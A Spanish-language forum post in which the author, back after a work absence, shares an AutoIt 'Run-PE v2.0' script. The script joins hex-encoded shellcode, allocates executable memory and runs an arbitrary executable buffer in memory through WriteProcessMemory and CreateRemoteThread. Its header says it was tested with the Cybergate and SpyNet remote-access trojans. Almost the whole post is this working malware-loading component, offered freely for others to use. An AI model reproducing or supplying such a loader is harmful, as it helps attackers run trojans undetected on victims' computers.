Hace tiempo no me conecto por cosas del trabajo que por estas datas me tomam todo el tiempo , pero no estoy muerto .... andare inactivo por más alguno tiempo , pero pronto volvere ....
Los dejo a disfrutar ....
Saludos
Código: Seleccionar todo
# ================================================
# Run-PE v2.0 [ Fasm ShellCode ]
# Run Exe Buffer From Memory ( Not Remote )
# Author : M3
# Thanks : DeadlyVermilion [ ShellCode ]
# Pirate-Inc (DZ)
# Pink
# Tested on XP SP3 | Win7 32 With Cybergate | SpyNet
# Usage : sRunFromMemory(SomeBinaryBuffer)
# Enjoy !!!
# ================================================
Func sRunFromMemory($sBinaryBuffer)
Local $sProcess , $sRemote_Tread , $sObject , $sMemoryStruct , $sStructPointer , $sStructShellCode , _
$sStructSize ,$sExeBuffer ,$sShellCodeBuffer,$sAsmBuffer ,$sLenExePath ,$sShellCode[19], $sShellBuffer , _
$sAsmCode , $sAsmLen , $sExeAlocateBuffer , $sMemoryAsmStruct , $sAsmBufferDest , $sAsmMemoryData
Local Const $sKernel32 = "kernel32"
If Not $sBinaryBuffer <> "" Then
ConsoleWrite('Binary buffer not Exists , Choose an .exe File to Read First ...' )
Exit
EndIf
$sShellCode[1] = '0X8BEC81C4A4FAFFFF8945FCE81B0200008985CCFDFFFFBBF20F56C68B95CCFDFFFFE819020000894'
$sShellCode[2] = '5F8BBA98B802D8B95CCFDFFFFE8060200008945F4BB853BAEDB8B95CCFDFFFFE8F30100008945F0BB'
$sShellCode[3] = '9335DF858B95CCFDFFFFE8E00100008945ECBB8DCBB65D8B95CCFDFFFFE8CD0100008945E8BB5313C'
$sShellCode[4] = '1788B95CCFDFFFFE8BA0100008945E4BB8ADBDFA58B95CCFDFFFFE8A70100008945E0BB2E0550C88B'
$sShellCode[5] = '95CCFDFFFFE8940100008945DCBB85A116A28B95CCFDFFFFE881010000E8060000006E74646C6C005'
$sShellCode[6] = 'F57FFD08985D0FDFFFFBB8BE3CD418BD0E8600100008945D8BB39230D2C8B95D0FDFFFFE84D010000'
$sShellCode[7] = '8945D468000200008D85D4FDFFFF506A00FF55F86A448D8588FDFFFF50FF55D4FF55F48BC88D8578F'
$sShellCode[8] = 'DFFFF508D8588FDFFFF506A006A006A046A006A006A00518D85D4FDFFFF50FF55F068CC0200008D85'
$sShellCode[9] = 'A4FAFFFF50FF55D4C785A4FAFFFF020001008D85A4FAFFFF50FFB57CFDFFFFFF55EC64A1300000008'
$sShellCode[10] = 'B400C8B40148B401050FFB578FDFFFFFF55D88B7DFC037F3C6A406800300000FF7750FF7734FFB57'
$sShellCode[11] = '8FDFFFFFF55E8898574FDFFFF6A00FF7754FF75FCFFB574FDFFFFFFB578FDFFFFFF55E48D4718898'
$sShellCode[12] = '570FDFFFF0FB74714018570FDFFFF33C033F633C9EB296BC628038570FDFFFF8B9D74FDFFFF03580'
$sShellCode[13] = 'C8B55FC0350146A00FF70105253FFB578FDFFFFFF55E446663B770672D18B8574FDFFFF034728898'
$sShellCode[14] = '554FBFFFF8D85A4FAFFFF50FFB57CFDFFFFFF55E0FFB57CFDFFFFFF55DCC9C364A1300000008B400'
$sShellCode[15] = 'C8B400C8B008B008B4018C3558BEC83C4F4528955FC8B4A3C03CA894DF48B497803CA894DF88B511'
$sShellCode[16] = '88B4920034DFC33FF8B310375FC33C051AC8BC803F8D3C785C075F5593BFB741083C1044A75E0BAC'
$sShellCode[17] = '258621B5A33C0C9C38B45FC8B4DF88B59188B492403C82BDAD1E303CB0FB7198B4DF88B491C03C8C'
$sShellCode[18] = '1E30203CB03015AC9C300'
For $i = 1 to 18
$sShellBuffer &= $sShellCode[$i]
Next
$sLenExePath = StringLen($sBinaryBuffer)
$sLenShellCode = StringLen($sShellBuffer) / 2
$sMemoryStruct = DllStructCreate ("Boolean BinaryBuffer[" & $sLenExePath & "];Boolean ShellCodeBuffer[" & $sLenShellCode - 1 & "];Boolean AsmCode[15]")
$sStructPointer = DllStructGetPtr ($sMemoryStruct , 1)
$sStructShellCode = DllStructGetPtr ($sMemoryStruct , 2)
$sStructSize = DllStructGetSize ($sMemoryStruct)
$sExeAlocateBuffer = DllCall($sKernel32, "ptr", "VirtualAlloc", "ptr", 0, "dword_ptr", $sStructSize, "dword", 4096, "dword", 64)
If IsArray($sExeAlocateBuffer) Then
$sExeBuffer = $sExeAlocateBuffer[0]
Else
ConsoleWrite ('Unable to Allocate Virtual Memory')
Exit
EndIf
$sShellCodeBuffer = $sExeBuffer + $sLenExePath
$sAsmCode = "0X8D05"
For $i = 11 To 3 Step -2
$sAsmCode &= StringMid ($sExeBuffer , $i , 2)
Next
$sAsmCode &= "8D1D"
For $i = 11 To 3 Step -2
$sAsmCode &= StringMid ($sShellCodeBuffer , $i , 2)
Next
$sAsmCode &= "FFD3C3"
$sAsmLen = StringLen($sAsmCode) / 2 - 1
$sMemoryAsmStruct = DllStructCreate("Boolean AsmCopyMemory[" & $sAsmLen & "]")
DllStructSetData($sMemoryAsmStruct, 1, $sAsmCode)
$sAsmBufferDest = DllStructGetPtr($sMemoryStruct, 3)
$sAsmMemoryData = DllStructGetPtr($sMemoryAsmStruct , 1)
CopyMemory($sAsmBufferDest, $sAsmMemoryData , $sAsmLen)
DllStructSetData ($sMemoryStruct, 1 ,$sBinaryBuffer)
DllStructSetData ($sMemoryStruct, 2 ,$sShellBuffer)
$sProcess = DllCall($sKernel32, "int", "OpenProcess", "int", 0x001f0fff, "int", 0, "int", @AutoItPID)
If IsArray($sProcess) And Not @error Then
$sProcess = $sProcess[0]
DllCall($sKernel32, "int", "WriteProcessMemory", "int", $sProcess, "ptr", $sExeBuffer, "ptr", $sStructPointer, "int", $sStructSize, "int", 0)
$sAsmBuffer = $sShellCodeBuffer + $sLenShellCode - 1
Else
ConsoleWrite('Unable to Open Process')
Exit
Endif
$sRemote_Tread = DllCall($sKernel32, "int", "CreateRemoteThread", "int", $sProcess, "ptr", 0, "int", 0, "int", $sAsmBuffer, "ptr", 0, "int", 0, "int", 0)
if IsArray ($sRemote_Tread) And Not @error Then
$sRemote_Tread = $sRemote_Tread[0]
DllCall($sKernel32, "int", "WaitForSingleObject", "int", $sRemote_Tread, "int", 100)
DllCall($sKernel32, "int", "CloseHandle", "int", $sProcess)
DllCall($sKernel32, "bool", "VirtualFree", "ptr", $sExeBuffer, "dword_ptr", 0, "dword", 0X8000)
Else
ConsoleWrite ('Unable to Create Thread')
Exit
EndIf
EndFunc
Func CopyMemory($Des,$Source,$len)
local $ASM = "0x8B7C24048B74240831C98B4C240CF3A4C300000000000000"
Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
DllStructSetData($BufferASM, 1, $ASM)
Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
"ptr", DllStructGetPtr($BufferASM), _
"ptr", $des, _
"ptr", $source, _
"int", $len, _
"int", 0)
EndFunc